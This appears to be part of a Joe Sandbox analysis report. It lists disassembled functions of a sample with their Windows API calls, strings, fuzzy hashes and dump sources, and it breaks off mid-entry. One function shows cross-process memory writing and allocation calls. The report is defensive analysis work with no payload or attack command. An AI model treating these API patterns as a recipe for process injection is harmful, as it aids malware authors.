Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 951e094f64c8256a54772808538d9474f233dc5b461c7f13aa6e72731c20fdf0
Instruction ID: d4248565d62e48d2679159a828c93949c4981106c9eb6f9acab3427c373a2abc
Opcode Fuzzy Hash: 951e094f64c8256a54772808538d9474f233dc5b461c7f13aa6e72731c20fdf0
Instruction Fuzzy Hash: C7F04F763402046FEB119FE4AD89E673BACFF89796F50052AFA41C7190DB609C82CA61

Function 00A4EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00A4EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 00A4ECAB
MessageBeep.USER32(00000000), ref: 00A4ECC3
KillTimer.USER32(?,0000040A), ref: 00A4ECDF
EndDialog.USER32(?,00000001), ref: 00A4ECF9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 2f20c5a8b5fe55b3b16c8c1737a1f725e116967a5559fcabceaa39b03924e2e9
Instruction ID: 980e74bf9d648abe33a8b23e85436e281655aa0bf5659048be12ffd9060347ac
Opcode Fuzzy Hash: 2f20c5a8b5fe55b3b16c8c1737a1f725e116967a5559fcabceaa39b03924e2e9
Instruction Fuzzy Hash: 5C018134600714ABEB24DB94DE8EB9677B8FF40705F00055AB682A24E0DFF0AA85CB80

Function 00A2B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00A2B0BA
StrokeAndFillPath.GDI32(?,?,00A8E680,00000000,?,?,?), ref: 00A2B0D6
SelectObject.GDI32(?,00000000), ref: 00A2B0E9
DeleteObject.GDI32 ref: 00A2B0FC
StrokePath.GDI32(?), ref: 00A2B117

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 741ede0bb446f2d4c39d6d836a5da30fb7ee13a7f81eb580e5882f7e07f0dc48
Instruction ID: dc097912b5ae892ca39246a1f3ded55f9ac64ab45ce8aea5a4dc877eea875307
Opcode Fuzzy Hash: 741ede0bb446f2d4c39d6d836a5da30fb7ee13a7f81eb580e5882f7e07f0dc48
Instruction Fuzzy Hash: A3F0B635115244AFDB22DFE9FC09B553B65A710766F188326F426450F1CB3189A7DF60

Function 00A5F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A5F2DA
CoCreateInstance.OLE32(00A9DA7C,00000000,00000001,00A9D8EC,?), ref: 00A5F2F2
CoUninitialize.OLE32 ref: 00A5F555

Strings

.lnk, xrefs: 00A5F28B, 00A5F290, 00A5F29E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 9b117e7ef7a49b9be53bd9ca417521f77f590106d20845f483262387ed4d73f5
Instruction ID: 113d4ebfd9fed52714187093f2c12f1f7373f47223283f9fe6b3aac500e8607a
Opcode Fuzzy Hash: 9b117e7ef7a49b9be53bd9ca417521f77f590106d20845f483262387ed4d73f5
Instruction Fuzzy Hash: C0A11971108201AFD700EF68D991EAFB7E8FF98714F00492DF55597192EB70EA49CBA2

Function 00A5E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A153B1,?,?,00A161FF,?,00000000,00000001,00000000), ref: 00A1662F

CoInitialize.OLE32(00000000), ref: 00A5E85D
CoCreateInstance.OLE32(00A9DA7C,00000000,00000001,00A9D8EC,?), ref: 00A5E876
CoUninitialize.OLE32 ref: 00A5E893

Part of subcall function 00A1936C: __swprintf.LIBCMT ref: 00A193AB
Part of subcall function 00A1936C: __itow.LIBCMT ref: 00A193DF

Strings

.lnk, xrefs: 00A5E83B, 00A5E84D

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 0d97d7de3a06a631bdb637628a44442333f6020008bb0cb16afa9b114a78716e
Instruction ID: 84e5a263a4400e972b230b8be972bb839067b44b9f4ea1f2ec379d66bd97e063
Opcode Fuzzy Hash: 0d97d7de3a06a631bdb637628a44442333f6020008bb0cb16afa9b114a78716e
Instruction Fuzzy Hash: B2A14675604301AFCB14DF24C584D6ABBE5FF88311F048999F9969B3A1CB31ED89CB91

Function 00A3325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00A332ED

Part of subcall function 00A3E0D0: __87except.LIBCMT ref: 00A3E10B

Strings

pow, xrefs: 00A332C5, 00A332E2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 1c952fb84d1028926d9f3c61137f27d9831ae3bb7e5ada8a5c47e3be7e081aa0
Instruction ID: 7be4a6f1ba71f70722384d77b001265d107cc928bc5c56f2bc1e4bb42003689b
Opcode Fuzzy Hash: 1c952fb84d1028926d9f3c61137f27d9831ae3bb7e5ada8a5c47e3be7e081aa0
Instruction Fuzzy Hash: C7515A32A0C30296CF15F798CA413BB6BA4DB61710F20CE69F4D6862E9DF348DD59B46

Function 00A54606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00AADC50,?,0000000F,0000000C,00000016,00AADC50,?), ref: 00A54645

Part of subcall function 00A1936C: __swprintf.LIBCMT ref: 00A193AB
Part of subcall function 00A1936C: __itow.LIBCMT ref: 00A193DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 00A546C5

Strings

THIS, xrefs: 00A54703
REMOVE, xrefs: 00A54676

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 13ed22b15570380b5ae8b009e01213e89f58f4c241e00d8eb9f33dffbaf27293
Instruction ID: 1364de7a09a968eebb4a2283f5af97542f3632403efc1cf2ab46a7204c32b830
Opcode Fuzzy Hash: 13ed22b15570380b5ae8b009e01213e89f58f4c241e00d8eb9f33dffbaf27293
Instruction Fuzzy Hash: 3F417134A002199FCF00DFA4C981AAEB7B5FF4D309F148469ED16AB292DB34DD89CB50

Function 00A4C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A4BC08,?,?,00000034,00000800,?,00000034), ref: 00A54335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A4C1D3

Part of subcall function 00A542D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A4BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00A54300

Part of subcall function 00A5422F: GetWindowThreadProcessId.USER32(?,?), ref: 00A5425A
Part of subcall function 00A5422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A4BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00A5426A
Part of subcall function 00A5422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A4BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00A54280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A4C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A4C28D

Strings

@, xrefs: 00A4C2A5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 8ba982485fd7d75d4ddc8ec2132ad601083ddf010ff86d337e5ca3e95abe1fcb
Instruction ID: 64de01d4fb40e0517a0c8d24e67381a9219ca84ff93344212a6c742dca1a4184
Opcode Fuzzy Hash: 8ba982485fd7d75d4ddc8ec2132ad601083ddf010ff86d337e5ca3e95abe1fcb
Instruction Fuzzy Hash: 95414D76A01218BFDB10EFA4CD81AEEB778FF49714F004095FA45B7181DAB16E89CB61

Function 00A7A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00AADC00,00000000,?,?,?,?), ref: 00A7A6D8
GetWindowLongW.USER32 ref: 00A7A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A7A705

Strings

SysTreeView32, xrefs: 00A7A6AA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 90d7a9efc116c039a9d3711f8e9f591cdb23a4f61fd82ab461433bf05fd9a597
Instruction ID: 113a52b1dee4025fff5aa2fc7d7cbafb2fa632b7023717c364b0da365f9b3dc4
Opcode Fuzzy Hash: 90d7a9efc116c039a9d3711f8e9f591cdb23a4f61fd82ab461433bf05fd9a597
Instruction Fuzzy Hash: C631BE31200205BBDB158F78CC41BEA7BA9FB99324F248725F87AD32E0D730E8519B90

Function 00A7A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A7A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A7A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A7A196

Strings

SysMonthCal32, xrefs: 00A7A129

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 5bf0a954211ef14854fba1d9bb40e54a1a18a285b8a22eb93be52d9764b1f066
Instruction ID: ba3f6dad13877838f656a64f7724798e11bd6de27902016ca6f995a110a4eba0
Opcode Fuzzy Hash: 5bf0a954211ef14854fba1d9bb40e54a1a18a285b8a22eb93be52d9764b1f066
Instruction Fuzzy Hash: 4A218D32610218BBEF118F94CC42FEE3B79EF98714F118214FA59AB190D6B5AC558B90

Function 00A7A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A7A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A7A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A7A956

Strings

msctls_updown32, xrefs: 00A7A8BB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: ed37fb06145b41433793d2dda5dee4aa113653274c05dbca3bb34a6edad2c956
Instruction ID: 0d1ac6d156f2f9b07b2681b4181529060079bc589fea727bec5d30b577363b40
Opcode Fuzzy Hash: ed37fb06145b41433793d2dda5dee4aa113653274c05dbca3bb34a6edad2c956
Instruction Fuzzy Hash: 482192B5600609BFDB10DF58DC91DAB37ADEB5A354F058159FA099B291CB30EC128B61

Function 00A799A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A79A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A79A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A79A65

Strings

Listbox, xrefs: 00A799FD

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 37839dcf9e3e7648e37b5cf3bd5e5805ad054c53e970374da4ce474192ed15a3
Instruction ID: 830b35ccf36f9b11b2672485478602574b94a2f1c70c57c494a935cad38946ea
Opcode Fuzzy Hash: 37839dcf9e3e7648e37b5cf3bd5e5805ad054c53e970374da4ce474192ed15a3
Instruction Fuzzy Hash: 0C21C532611118BFEF218F54DC85FBB3BAAEF89790F01C12AFA48571A0C6719C5287A0

Function 00A7A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A7A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A7A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A7A48F

Strings

msctls_trackbar32, xrefs: 00A7A444

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 2ac4601c84c4f916939ee042ee1b158ce0f3589b79c89bf652d43ecf448f63dc
Instruction ID: ab964e5668f714e034b4c4584010ef6ec13b74e08bea50b7cd390b52d144dbf1
Opcode Fuzzy Hash: 2ac4601c84c4f916939ee042ee1b158ce0f3589b79c89bf652d43ecf448f63dc
Instruction Fuzzy Hash: 1611E771240208BEEF209F64CC49FAB3769EFD8754F018228FA4996091D6B2E851C724

Function 00A32287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00A32350,?), ref: 00A322A1
GetProcAddress.KERNEL32(00000000), ref: 00A322A8

Strings

RoInitialize, xrefs: 00A32290
combase.dll, xrefs: 00A3229C

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 92cc6e2a9bb3182b090391b195d0e0921baf2495bdd62b62a4d8cb237b50cbbf
Instruction ID: 3f8b25b205e8d901f65b6e54d725476aa5a70aeca10a1458927e0e5af12d46ea
Opcode Fuzzy Hash: 92cc6e2a9bb3182b090391b195d0e0921baf2495bdd62b62a4d8cb237b50cbbf
Instruction Fuzzy Hash: 4DE01270B91300ABDF20DFF0ED4AF653BA4BB10B46F104622B103D60A0CBB44082CF18

Function 00A3235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A32276), ref: 00A32376
GetProcAddress.KERNEL32(00000000), ref: 00A3237D

Strings

combase.dll, xrefs: 00A32371
RoUninitialize, xrefs: 00A32365

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 4f4b2640a559185ab9f854c52f71ba57bafd4541f52e7fbe4f8a23ec56b2c6e4
Instruction ID: fc045be218d3aa3fc3f75599490ecc118a54dbeb88fe70794437b7aa6d0ac9c3
Opcode Fuzzy Hash: 4f4b2640a559185ab9f854c52f71ba57bafd4541f52e7fbe4f8a23ec56b2c6e4
Instruction Fuzzy Hash: E6E0B670786305ABDB20DFE0ED0DF143BA4B710746F110516F10AD60B0CBB894928B14

Function 00A8AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A8AC60
__swprintf.LIBCMT ref: 00A8AC94

Strings

%.3d, xrefs: 00A8AC6E
WIN_XPe, xrefs: 00A8ACD3

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: a0226eacb9155571cc436d05269e0db234ee67a135448fef5ae58ad5cc684df0
Instruction ID: 1838975ad1487f63b4443371f96b8b5cada9a2076482b50ae6a341d087982457
Opcode Fuzzy Hash: a0226eacb9155571cc436d05269e0db234ee67a135448fef5ae58ad5cc684df0
Instruction Fuzzy Hash: 53E012F1804618EBDB50E7D4DE05DF9777CA718741F140493B906A1500D6359BD5AB12

Function 00A142F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00A142EC,?,00A142AA,?), ref: 00A14304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A14316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00A14310
kernel32.dll, xrefs: 00A142FF

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 22fdc03b8487b8bfda570d5e9769b63797415a792d2c780b22735523af02ef50
Instruction ID: 5e527d5186f560d9b964ee845f41d283d8980026077f3dad370f584b9f91012f
Opcode Fuzzy Hash: 22fdc03b8487b8bfda570d5e9769b63797415a792d2c780b22735523af02ef50
Instruction Fuzzy Hash: D7D0C771544712AFD7209F65E81CB4176D4BB18711B11891EE555E6164DBB0C8C18750

Function 00A72205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A721FB,?,00A723EF), ref: 00A72213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00A72225

Strings

GetProcessId, xrefs: 00A7221F
kernel32.dll, xrefs: 00A7220E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
